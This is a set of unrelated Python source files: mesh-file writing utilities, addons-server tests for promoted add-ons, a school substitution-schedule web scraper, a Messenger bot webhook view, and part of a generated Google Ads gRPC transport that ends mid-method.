for icount,elem_num in enumerate(mesh_dict['elements']):
node_zones.update({icount:1})
else:
node_zones = {}
for icount,(elem_num,elem_zone) in enumerate(zip(mesh_dict['elements'],mesh_dict['zones'])):
node_zones.update({icount:elem_zone})
# Write new mesh3d.dat file
if os.path.dirname(out_file) in ['']:
# Save to same dirictory as .msh file
output_file = os.path.join(os.path.dirname(msh_fname),out_file)
else:
output_file = out_file # Directory already specified in output
exist_flag=0
if os.path.isfile(output_file):
print("Warning: {} is already created. Default is to overwrite.".format(output_file))
exist_flag = 1
all_zones = []
if exist_flag == 0 or overwrite:
with open(output_file,'w') as wfid:
# Define mesh components. Create one dirichlet node, datum = 0
wfid.write('%d %d \n' % (len(mesh_dict['elements']), len(mesh_dict['nodes'])))
wfid.write('\n')
if isinstance(mesh_dict['elements'],np.ndarray):
mesh_dict['elements'] = mesh_dict['elements'].tolist()
icount=1
for i, elem in enumerate(mesh_dict['elements']):
wfid.write('{0:10.0f}'.format(i + 1))
if param_zones is not None:
if node_zones[i] in param_zones.keys():
if param_zones[node_zones[i]]['param']: # if it is true
icount-=1 # keep icount the same if still in the zone
elem.insert(-1,icount) # unique parameter number
icount+=1
for entry in elem[:-1]:
wfid.write('{0:10.0f}'.format(entry))
temp_node_zone = default_zone
if node_zones[i] in param_zones.keys():
if param_zones[node_zones[i]]['zone']: # if it is true
temp_node_zone = node_zones[i]+1 # increase from default if 1
wfid.write('{0:10.0f}'.format(temp_node_zone))
all_zones.append(temp_node_zone)
wfid.write('\n')
wfid.write('\n')
wfid.write('\n')
for i, node in enumerate(mesh_dict['nodes']):
node_entry = list(node)
node_entry.insert(0, i+1)
wfid.write('{0:d} {1:10.3f} {2:10.3f} \n'.format(*node_entry[:-1]))
unq_zones = np.unique(all_zones)
# Show mesh information
message = """
%s has been successfully created.
Mesh Info:
Type of elements: %s
Nodes: %d
Elements: %d
Zones: %d
""" % (os.path.basename(output_file), mesh_dict['mesh_type'],
len(mesh_dict['elements']), len(mesh_dict['nodes']),
len(set(mesh_dict['zones'])))
if verbose:
print(message)
return message,len(unq_zones),mesh_dict,topo_data
def gridfit(xyz=None,xynodes=None, smoothness=1, interp='triangle',
regularize_type='gradient', solver='vector', max_iter=None,
extend='warning', tilesize=np.inf, overlap=0.2, mask=None,
autoscale=True, xyscale=[1,1]):
'''Conform surface to regular grid.
Source: After Matlab gridfit.m function by James Ramm 2012 in R3 package.
'''
# Unpack xyz
if isinstance(xyz,list):
x,y,z = xyz # Unpack xyz list
elif isinstance(xyz,np.ndarray):
x,y,z = xyz[:,0], xyz[:,1], xyz[:,2]
print("Error: gridfit function in development and incomplete.")
return x,y,z
def find_boundary_pts(boundary_dict=None,exclude_array=None):
'''Find mesh points not in exclude_array.'''
out_points = []
out_edge_keys = []
for ikey1 in boundary_dict.keys():
temp_catch = True
for ipt in boundary_dict[ikey1]:
if ipt not in exclude_array and ipt not in out_points:
out_points.extend([ipt])
elif ipt in exclude_array:
temp_catch=False
if temp_catch:
out_edge_keys.append(ikey1)
return np.array(out_points),out_edge_keys
def load_delim(fname,nheaders=2,delimiter=' ',
col_scales = [1,1,1,1],cols2read=[0,1],
drop_na=True):
'''Load delimited text file.'''
with open(fname,'r') as f:
header_info = []
data_list = []
irow = 0
for iline in f:
if irow < nheaders:
header_info.append(iline)
elif iline not in ['\n']:
data_list.append([float(ipiece.strip().strip(' \t')) for ipiece in np.array(iline.split(delimiter))[cols2read]])
irow += 1
data_array = np.array(data_list)
for icol,iscale in enumerate(col_scales):
if icol < data_array.shape[-1]:
if float(iscale) != 0.0:
data_array[:,icol] = data_array[:,icol]*float(iscale)
if drop_na:
data_array = data_array[~np.isnan(data_array.sum(axis=1))]
return data_array,header_info
def insert_key_halfway(orig_dict=None,in_keys=None,
new_pts=None,new_keys=None):
'''Insert key into unordered dictionary.'''
out_dict = orig_dict.copy()
# Reassign key entries as ints
if 'order' in out_dict.keys():
dict_keys = out_dict['order']
else:
dict_keys = np.sort(list(out_dict.keys())).tolist()
for in_key,new_pt,new_key in zip(in_keys,new_pts,new_keys):
entry_orig = orig_dict[in_key]
new_entries = dict(zip((in_key,new_key),
([entry_orig[0],new_pt],
[new_pt,entry_orig[1]])))
in_key_ind = dict_keys.index(in_key)
dict_keys.insert(in_key_ind+1,new_key)
out_dict.update(new_entries)
out_dict.update({'order':dict_keys})
return out_dict
def renumber_dict(in_dict=None,start_num=None):
'''Renumber unordered dictionary.'''
if 'order' in in_dict.keys():
dict_keys = in_dict['order']
else:
dict_keys = np.sort(list(in_dict.keys()))
final_dict={}
out_order = []
icount_keys = start_num
for ikey in dict_keys:
final_dict[icount_keys] = in_dict[ikey]
out_order.append(icount_keys)
icount_keys+=1
final_dict['order'] = out_order
return final_dict,icount_keys
def check_dict_entries(main_dict=None,other_dict=None):
'''Check if dictionary entry exists in main dictionary.'''
if 'order' in main_dict.keys():
main_keys = main_dict['order']
else:
main_keys = np.sort(list(main_dict.keys()))
main_entries = np.array([main_dict[main_key] for main_key in main_keys])
if 'order' in other_dict.keys():
other_keys = other_dict['order']
else:
other_keys = np.sort(list(other_dict.keys()))
out_key_order =[]
new_dict = other_dict.copy()
replaced_keys = []
for ikey,other_key in enumerate(other_keys):
other_entry = new_dict[other_key]
ind_found = pyres_utils.match_xy(main_entries,np.array(other_entry))
if len(ind_found)> 0:
old_key = new_dict.pop(other_key,None)
replaced_keys.append([other_key,main_keys[ind_found[0]]])
out_key_order.append(main_keys[ind_found[0]])
new_dict[main_keys[ind_found[0]]]=main_dict[main_keys[ind_found[0]]]
else:
out_key_order.append(other_key)
new_dict.update({'order':out_key_order})
return new_dict, replaced_keys
|
|
import datetime
from unittest import mock
from django.test.utils import override_settings
from olympia import amo
from olympia.amo.tests import addon_factory, TestCase
from olympia.amo.urlresolvers import reverse
from olympia.constants import applications, promoted
from olympia.promoted.models import (
PromotedAddon, PromotedApproval, PromotedSubscription)
class TestPromotedAddon(TestCase):
def test_basic(self):
promoted_addon = PromotedAddon.objects.create(
addon=addon_factory(), group_id=promoted.SPONSORED.id)
assert promoted_addon.group == promoted.SPONSORED
assert promoted_addon.application_id is None
assert promoted_addon.all_applications == [
applications.FIREFOX, applications.ANDROID]
promoted_addon.update(application_id=applications.FIREFOX.id)
assert promoted_addon.all_applications == [applications.FIREFOX]
def test_is_approved_applications(self):
addon = addon_factory()
promoted_addon = PromotedAddon.objects.create(
addon=addon, group_id=promoted.LINE.id)
assert addon.promotedaddon
# Just having the PromotedAddon instance isn't enough
assert addon.promotedaddon.approved_applications == []
# the current version needs to be approved also
promoted_addon.approve_for_version(addon.current_version)
addon.reload()
assert addon.promotedaddon.approved_applications == [
applications.FIREFOX, applications.ANDROID]
# but not if it's for a different type of promotion
promoted_addon.update(group_id=promoted.SPONSORED.id)
assert addon.promotedaddon.approved_applications == []
# unless that group has an approval too
PromotedApproval.objects.create(
version=addon.current_version, group_id=promoted.SPONSORED.id,
application_id=applications.FIREFOX.id)
addon.reload()
assert addon.promotedaddon.approved_applications == [
applications.FIREFOX]
# for promoted groups that don't require pre-review though, there isn't
# a per version approval, so a current_version is sufficient and all
# applications are seen as approved.
promoted_addon.update(group_id=promoted.STRATEGIC.id)
assert addon.promotedaddon.approved_applications == [
applications.FIREFOX, applications.ANDROID]
def test_creates_a_subscription_when_group_should_have_one(self):
assert PromotedSubscription.objects.count() == 0
promoted_addon = PromotedAddon.objects.create(
addon=addon_factory(), group_id=promoted.SPONSORED.id
)
assert PromotedSubscription.objects.count() == 1
assert (PromotedSubscription.objects.all()[0].promoted_addon ==
promoted_addon)
# Do not create a subscription twice.
promoted_addon.save()
assert PromotedSubscription.objects.count() == 1
def test_no_subscription_created_when_group_should_not_have_one(self):
assert PromotedSubscription.objects.count() == 0
PromotedAddon.objects.create(
addon=addon_factory(), group_id=promoted.LINE.id
)
assert PromotedSubscription.objects.count() == 0
def test_auto_approves_addon_when_saved_for_immediate_approval(self):
# empty case with no group set
promo = PromotedAddon.objects.create(
addon=addon_factory(), application_id=amo.FIREFOX.id)
assert promo.group == promoted.NOT_PROMOTED
assert promo.approved_applications == []
assert not PromotedApproval.objects.exists()
# first test with a group.immediate_approval == False
promo.group_id = promoted.RECOMMENDED.id
promo.save()
promo.addon.reload()
assert promo.approved_applications == []
assert not PromotedApproval.objects.exists()
promo.addon.promoted_group() == promoted.NOT_PROMOTED
# then with a group thats immediate_approval == True
promo.group_id = promoted.SPOTLIGHT.id
promo.save()
promo.addon.reload()
assert promo.approved_applications == [amo.FIREFOX]
assert PromotedApproval.objects.count() == 1
promo.addon.promoted_group() == promoted.SPOTLIGHT
# test the edge case where the application was changed afterwards
promo.application_id = 0
promo.save()
promo.addon.reload()
assert promo.approved_applications == [amo.FIREFOX, amo.ANDROID]
assert PromotedApproval.objects.count() == 2
@mock.patch('olympia.lib.crypto.tasks.sign_file')
def test_approve_for_addon(self, mock_sign_file):
promo = PromotedAddon.objects.create(
addon=addon_factory(version_kw={'version': '0.123a'}),
group_id=promoted.SPOTLIGHT.id)
file_ = promo.addon.current_version.all_files[0]
file_.update(filename='webextension.xpi')
with amo.tests.copy_file(
'src/olympia/files/fixtures/files/webextension.xpi',
file_.file_path):
# SPOTLIGHT doesnt have special signing states so won't be resigned
promo.addon.reload()
promo.addon.promoted_group() == promoted.NOT_PROMOTED
promo.approve_for_addon()
promo.addon.reload()
promo.addon.promoted_group() == promoted.SPOTLIGHT
assert promo.addon.current_version.version == '0.123a'
mock_sign_file.assert_not_called()
# VERIFIED does though.
promo.update(group_id=promoted.VERIFIED.id)
promo.addon.reload()
promo.addon.promoted_group() == promoted.NOT_PROMOTED
promo.approve_for_addon()
promo.addon.reload()
promo.addon.promoted_group() == promoted.VERIFIED
assert promo.addon.current_version.version == '0.123a.1-signed'
mock_sign_file.assert_called_with(file_)
class TestPromotedSubscription(TestCase):
def test_get_onboarding_url_with_new_object(self):
sub = PromotedSubscription()
assert sub.get_onboarding_url() is None
def test_get_relative_onboarding_url(self):
promoted_addon = PromotedAddon.objects.create(
addon=addon_factory(), group_id=promoted.SPONSORED.id
)
sub = PromotedSubscription.objects.filter(
promoted_addon=promoted_addon
).get()
assert sub.get_onboarding_url(absolute=False) == reverse(
"devhub.addons.onboarding_subscription",
args=[sub.promoted_addon.addon.slug],
add_prefix=False
)
def test_get_onboarding_url(self):
promoted_addon = PromotedAddon.objects.create(
addon=addon_factory(), group_id=promoted.SPONSORED.id
)
sub = PromotedSubscription.objects.filter(
promoted_addon=promoted_addon
).get()
external_site_url = "http://example.org"
with override_settings(EXTERNAL_SITE_URL=external_site_url):
url = sub.get_onboarding_url()
assert url == "{}{}".format(
external_site_url,
reverse(
"devhub.addons.onboarding_subscription",
args=[sub.promoted_addon.addon.slug],
add_prefix=False
),
)
assert "en-US" not in url
def test_stripe_checkout_completed(self):
sub = PromotedSubscription()
assert not sub.stripe_checkout_completed
sub.update(payment_completed_at=datetime.datetime.now())
assert sub.stripe_checkout_completed
def test_stripe_checkout_cancelled(self):
sub = PromotedSubscription()
assert not sub.stripe_checkout_cancelled
sub.update(payment_cancelled_at=datetime.datetime.now())
assert sub.stripe_checkout_cancelled
def test_addon_already_approved(self):
addon = addon_factory()
promoted_addon = PromotedAddon.objects.create(
addon=addon, group_id=promoted.SPONSORED.id
)
sub = PromotedSubscription.objects.filter(
promoted_addon=promoted_addon
).get()
assert not sub.addon_already_promoted
promoted_addon.approve_for_version(addon.current_version)
sub.reload()
assert sub.addon_already_promoted
|
|
#!/usr/bin/python
from bs4 import BeautifulSoup
from dbconnect import connection
import requests
import date_module
import classes
import professors
import traceback
from compiler.ast import flatten
import time
def get_html(link):
# TODO: Install SSL Certificate Before Production
try:
r = requests.get(link, verify=False)
except:
return False
soup = BeautifulSoup(r.text, 'html.parser')
try:
content = soup.find('meta', attrs={'http-equiv': 'Content-Type'})['content']
index = content.find('=') + 1
r.encoding = content[index:]
except:
r.encoding = "utf-8"
text = r.text
html = BeautifulSoup(text, 'html.parser')
return html
def get_tables(table_name, old_dates_count, html):
tables = []
for table in html.find_all('table', table_name)[old_dates_count:]:
tables.append(table)
return tables
# Is the tag from the group that displays all days on one page or not?
def is_tag_simple(tag):
if tag.find('#tr') != -1 or tag.find('#su') != -1:
return True
else:
return False
# Does the link have ending '.htm'? If it does, then before going to changes page, we need to delete it and then append src
def get_basic_link(link):
if link.find('.htm') != -1:
final_link = link.rsplit('/', 1)[0]
return final_link
else:
return link
def get_final_link(basic_link, suffix):
final_link = basic_link + "/" + suffix
return final_link
# When every day is on another page, getting the links is a little bit difficult
def get_individual_links(html, basic_link):
dates = []
individual_links = []
if html == False:
return []
for string_date in html.find_all('option'):
date = date_module.get_date(string_date)
if date_module.is_date_present(date):
final_link = get_final_link(basic_link, string_date['value'])
individual_links.append(final_link)
# Dates are from newest to oldest => in this case it means there is no chance of relevant date
# No need to go through all of them
elif len(dates) == 2 and dates[0] < dates[1]:
break
return individual_links
def get_schools():
c, conn = connection()
sql = "SELECT `school` FROM `schools`"
c.execute(sql)
schools = [school[0] for school in c.fetchall()]
conn.close()
return schools
def is_school_in_db(school):
c, conn = connection()
sql = "SELECT `school` FROM `schools` WHERE `school`=%s"
c.execute(sql, (school))
result = c.fetchone()
if result == None:
sql = "INSERT INTO `schools` (`school`) VALUES (%s)"
c.execute(sql, (school))
conn.commit()
conn.close()
return False
else:
conn.close()
return True
def get_links(html, link):
frame = html.find('frame', attrs={'name': 'surrmmdd'})
try:
src = frame['src']
except TypeError:
return []
basic_link = get_basic_link(link)
if is_tag_simple(src):
final_link = get_final_link(basic_link, src)
return [final_link]
else:
head_link = html.find('frame', attrs={'name': 'suplhlav'})['src']
# That's how it's called in the original but translated (Czech in programming sucks :/ )
head_basic_link = basic_link + "/" + head_link
head_html = get_html(head_basic_link)
return get_individual_links(head_html, basic_link)
def get_index(html):
# FIX: Definitely need to check the values of the tags
a = html.find('a')
try:
if a['name'].find('tr') != -1:
return "1"
else:
return "3"
except:
return "3"
def fix_tables(html, old_dates_count, index, dates):
dates_number = old_dates_count
#print("D: {0}", (dates))
for paragraph in html.body.find_all('p', recursive=False):
try:
if paragraph['class'][0] == 'textnormal_' + index and dates_number < len(dates) - 2:
dates.pop(dates_number - 1)
dates_number -= 1
if len(dates) == 0:
return dates
if paragraph['class'][0] == 'textlarge_' + index:
dates_number += 1
except KeyError:
continue
#except IndexError:
# print(dates)
# print(html)
return dates
def get_data(html, school, should_compare):
# Indexes in names of CSS classes vary
index = get_index(html)
# Getting dates and count of old ones (don't need to extract data from those)
(dates, old_dates_count) = date_module.get_dates(html, index)
student_tables = get_tables('tb_supltrid_' + index, old_dates_count, html)
professor_tables = get_tables('tb_suplucit_' + index, old_dates_count, html)
if len(student_tables) < len(dates):
dates = fix_tables(html, old_dates_count, index, dates)
if len(dates) != 0 and len(student_tables) != 0:
classes.data(html, student_tables, dates, school, should_compare)
if len(dates) != 0 and len(professor_tables) != 0:
professors.data(html, professor_tables, dates, school, should_compare)
return dates
def delete_dates_not_present_for_professors(dates, school):
c, conn = connection()
select = "SELECT DISTINCT professor_changes.date FROM professor_changes, professors WHERE professors.school=%s" \
" AND professor_changes.professor_id = professors.professor_id"
c.execute(select, (school))
all_dates = [date[0] for date in c.fetchall()]
dates = flatten(dates)
for date in all_dates:
if date.date() not in dates:
delete = "DELETE professor_changes FROM professor_changes JOIN professors ON professor_changes.professor_id = professors.professor_id" \
" WHERE professors.school=%s AND professor_changes.date=%s"
c.execute(delete, (school, date))
conn.commit()
conn.close()
def delete_dates_not_present_for_clases(dates, school):
c, conn = connection()
select = "SELECT DISTINCT changes.date FROM changes, classes WHERE classes.school=%s" \
" AND changes.clas_id = classes.clas_id"
c.execute(select, (school))
all_dates = [date[0] for date in c.fetchall()]
dates = flatten(dates)
for date in all_dates:
if date.date() not in dates:
delete = "DELETE changes FROM changes JOIN classes ON changes.clas_id = classes.clas_id WHERE classes.school=%s" \
" AND changes.date=%s"
c.execute(delete, (school, date))
conn.commit()
conn.close()
def get_school_data(school, should_compare):
# Initial html given by the user
html = get_html(school)
if html == False:
return
if html.text == "":
return
# Dates that are relevant and exist on the web
current_dates = []
# Changes not displayed on the initial html
if html.find('a') == None:
# Get individual links where the changes are stored and iterate through them
links_list = get_links(html, school)
for link in links_list:
html = get_html(link)
if html == False or html.text == "":
continue
dates = get_data(html, school, should_compare)
current_dates.append(dates)
else:
dates = get_data(html, school, should_compare)
current_dates.append(dates)
delete_dates_not_present_for_professors(current_dates, school)
delete_dates_not_present_for_clases(current_dates, school)
def check_school(school):
if not is_school_in_db(school):
get_school_data(school, False)
def run_scrape():
import time
timestamp = time.time()
number = 0
for line in reversed(list(open('/home/scrape/log-file.txt'))):
try:
number = int(line.rstrip().split()[-1]) + 1
file = open('/home/scrape/log-file.txt', 'a')
file.write("Run %d\n" % number)
file.close()
break
except:
pass
if number == 0:
file = open('/home/scrape/log-file.txt', 'w')
file.write("Run %d\n" % number)
file.close()
schools = get_schools()
try:
for school in schools:
print(school)
# for i in range(0, 1):
# school = 'http://old.gjk.cz/suplovani.php'
get_school_data(school, True)
file = open('/home/scrape/log-file.txt', 'a')
file.write("Success\n")
file.close()
except Exception as e:
file = open('/home/scrape/log-file.txt', 'a')
file.write("%s\n" % traceback.format_exc())
file.close()
# Mark session => notifications will not be sent twice
if __name__ == "__main__":
run_scrape()
|
|
from rest_framework.views import APIView
from permabots.models import MessengerBot, MessengerMessage
from rest_framework.response import Response
from rest_framework import status
import logging
from permabots.tasks import handle_messenger_message
from datetime import datetime
from permabots import caching
import sys
import traceback
from time import mktime
from six import iteritems
logger = logging.getLogger(__name__)
class OnlyTextMessages(Exception):
pass
class Resource(object):
def to_json(self):
output_json = {}
for obj_key, json_key in iteritems(self.property_mapping()):
attr = getattr(self, obj_key)
if attr is not None:
output_json[json_key] = attr
return output_json
@classmethod
def from_json(cls, json):
mapping = {v: k for k, v in iteritems(cls.property_mapping())}
return cls(**{mapping[key]: value for key, value in iteritems(json) if key in mapping})
@classmethod
def property_mapping(cls):
"""
A map of property name to json key name for properties that can be simply serialized to/from json
(no objects, etc.)
"""
raise NotImplementedError('Resource objects must define a property_mapping')
class MessengerTextMessage(Resource):
def __init__(self, mid, seq, text):
self.mid = mid
self.seq = seq
self.text = text
@classmethod
def property_mapping(cls):
return {
'mid': 'mid',
'seq': 'seq',
'text': 'text'
}
class MessengerPostbackMessage(Resource):
def __init__(self, payload):
self.payload = payload
@classmethod
def property_mapping(cls):
return {
'payload': 'payload'
}
class MessengerMessaging(Resource):
def __init__(self, sender=None, recipient=None, timestamp=None, type=None, message=None):
self.sender = sender
self.recipient = recipient
self.timestamp = timestamp
self.type = type
self.message = message
@property
def is_message(self):
return self.type == 'message'
@property
def is_postback(self):
return self.type == 'postback'
@property
def is_delivery(self):
return self.type == 'delivery'
@classmethod
def property_mapping(cls):
return {}
def to_json(self):
output_json = super(MessengerMessaging, self).to_json()
output_json['sender'] = {'id': self.sender}
output_json['recipient'] = {'id': self.recipient}
output_json['timestamp'] = int(mktime(self.timestamp.timetuple()))
output_json[self.type] = self.message.to_json()
return output_json
@classmethod
def from_json(cls, json):
message = super(MessengerMessaging, cls).from_json(json)
if 'timestamp' in json:
message.timestamp = datetime.fromtimestamp(json['timestamp']/1000.)
if 'sender' in json:
message.sender = json['sender']['id']
if 'recipient' in json:
message.recipient = json['recipient']['id']
if 'message' in json:
message.type = 'message'
message.message = MessengerTextMessage.from_json(json['message'])
elif 'postback' in json:
message.type = 'postback'
message.message = MessengerPostbackMessage.from_json(json['postback'])
else:
message.type = 'delivery'
return message
class MessengerEntry(Resource):
def __init__(self, page_id, time=None, messaging=None):
self.page_id = page_id
self.time = time
self.messaging = messaging
@classmethod
def property_mapping(cls):
return {
'page_id': 'id',
}
def to_json(self):
output_json = super(MessengerEntry, self).to_json()
output_json['time'] = int(mktime(self.time.timetuple()))
output_json['messaging'] = [message.to_json() for message in self.messaging]
return output_json
@classmethod
def from_json(cls, json):
entry = super(MessengerEntry, cls).from_json(json)
if 'time' in json:
entry.time = datetime.fromtimestamp(json['time']/1000.)
if 'messaging' in json:
entry.messaging = [MessengerMessaging.from_json(msg) for msg in json['messaging']]
return entry
class Webhook(Resource):
def __init__(self, object, entries=None):
self.entries = entries
def to_json(self):
output_json = {'object': "page",
'entry': [entry.to_json() for entry in self.entries]}
return output_json
@classmethod
def from_json(cls, json):
webhook = super(Webhook, cls).from_json(json)
if 'entry' in json:
webhook.entries = [MessengerEntry.from_json(entry) for entry in json['entry']]
return webhook
@classmethod
def property_mapping(cls):
return {
'object': 'object',
}
class MessengerHookView(APIView):
"""
View for Facebook Messenger webhook
"""
def get(self, request, hook_id):
"""
Verify token when configuring webhook from facebook dev.
MessengerBot.id is used for verification
"""
try:
bot = caching.get_or_set(MessengerBot, hook_id)
except MessengerBot.DoesNotExist:
logger.warning("Hook id %s not associated to a bot" % hook_id)
return Response(status=status.HTTP_404_NOT_FOUND)
if request.query_params.get('hub.verify_token') == str(bot.id):
return Response(int(request.query_params.get('hub.challenge')))
return Response('Error, wrong validation token')
def create_message(self, webhook_message, bot):
if webhook_message.is_message:
type = MessengerMessage.MESSAGE
text = webhook_message.message.text
postback = None
else:
type = MessengerMessage.POSTBACK
text = None
postback = webhook_message.message.payload
message, _ = MessengerMessage.objects.get_or_create(bot=bot,
sender=webhook_message.sender,
recipient=webhook_message.recipient,
timestamp=webhook_message.timestamp,
type=type,
text=text,
postback=postback)
caching.set(message)
return message
def post(self, request, hook_id):
"""
Process Messenger webhook.
1. Get an enabled Messenger bot
3. For each message serialize
4. For each message create :class:`MessengerMessage <permabots.models.messenger_api.MessengerMessage>`
5. Delay processing of each message to a task
6. Response provider
"""
try:
bot = caching.get_or_set(MessengerBot, hook_id)
except MessengerBot.DoesNotExist:
logger.warning("Hook id %s not associated to a bot" % hook_id)
return Response(status=status.HTTP_404_NOT_FOUND)
logger.debug("Messenger Bot %s attending request %s" % (bot, request.data))
webhook = Webhook.from_json(request.data)
for webhook_entry in webhook.entries:
for webhook_message in webhook_entry.messaging:
try:
if webhook_message.is_delivery:
raise OnlyTextMessages
message = self.create_message(webhook_message, bot)
if bot.enabled:
logger.debug("Messenger Bot %s attending request %s" % (bot, message))
handle_messenger_message.delay(message.id, bot.id)
else:
logger.error("Message %s ignored by disabled bot %s" % (message, bot))
except OnlyTextMessages:
logger.warning("Not text message %s for bot %s" % (message, hook_id))
except:
exc_info = sys.exc_info()
traceback.print_exception(*exc_info)
logger.error("Error processing %s for bot %s" % (webhook_message, hook_id))
return Response(status=status.HTTP_500_INTERNAL_SERVER_ERROR)
return Response(status=status.HTTP_200_OK)
|
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers
from google.api_core import operations_v1
from google.api_core import gapic_v1
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v9.resources.types import offline_user_data_job
from google.ads.googleads.v9.services.types import offline_user_data_job_service
from google.longrunning import operations_pb2 # type: ignore
from .base import OfflineUserDataJobServiceTransport, DEFAULT_CLIENT_INFO
class OfflineUserDataJobServiceGrpcTransport(
OfflineUserDataJobServiceTransport
):
"""gRPC backend transport for OfflineUserDataJobService.
Service to manage offline user data jobs.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = google.auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = google.auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: ga_credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
address (Optionsl[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
def close(self):
self.grpc_channel.close()
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if "operations_client" not in self.__dict__:
self.__dict__["operations_client"] = operations_v1.OperationsClient(
self.grpc_channel
)
# Return the client from cache.
return self.__dict__["operations_client"]
@property
def create_offline_user_data_job(
self,
) -> Callable[
[offline_user_data_job_service.CreateOfflineUserDataJobRequest],
offline_user_data_job_service.CreateOfflineUserDataJobResponse,
]:
r"""Return a callable for the create offline user data job method over gRPC.
Creates an offline user data job.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `DatabaseError <>`__ `FieldError <>`__
`HeaderError <>`__ `InternalError <>`__
`NotAllowlistedError <>`__ `OfflineUserDataJobError <>`__
`QuotaError <>`__ `RequestError <>`__
Returns:
Callable[[~.CreateOfflineUserDataJobRequest],
~.CreateOfflineUserDataJobResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_offline_user_data_job" not in self._stubs:
self._stubs[
"create_offline_user_data_job"
] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v9.services.OfflineUserDataJobService/CreateOfflineUserDataJob",
request_serializer=offline_user_data_job_service.CreateOfflineUserDataJobRequest.serialize,
